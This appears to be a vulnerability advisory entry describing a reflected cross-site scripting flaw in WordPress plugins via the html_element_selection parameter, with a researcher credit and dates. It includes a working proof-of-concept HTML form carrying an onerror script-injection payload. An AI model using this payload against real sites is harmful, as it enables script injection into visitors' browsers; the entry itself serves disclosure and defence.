The plugins do not sanitise and escape the html_element_selection parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting
<form action="https://example.com/" method="POST"> <input type="text" name="html_element_selection" value="</script><img src onerror=alert(/XSS/)>"> <input type="submit" value="Exploit me pls" /> </form>
Krzysztof Zając
Krzysztof Zając
Yes
2022-01-24 (about 1 years ago)
2022-01-24 (about 1 years ago)
2022-04-11 (about 9 months ago)